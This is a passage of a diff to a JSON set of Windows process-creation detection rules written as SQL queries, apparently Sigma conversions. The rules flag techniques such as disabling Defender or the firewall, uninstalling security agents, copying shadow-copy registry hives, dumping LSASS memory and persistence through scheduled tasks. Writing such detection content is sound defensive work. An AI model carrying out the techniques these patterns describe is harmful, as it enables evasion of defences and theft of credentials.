"falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systeminfo_execution.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Execution of Hostname", - "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "status": "test", - "description": "Use of hostname to get information", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "status": "experimental", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hostname_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "status": "experimental", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" - }, - { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "Local Accounts Discovery", + "id": "502b42de-4306-40b4-9596-6f590c81f073", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.discovery", + "attack.t1033", + "attack.t1087.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user enumerates local users for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1197" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE 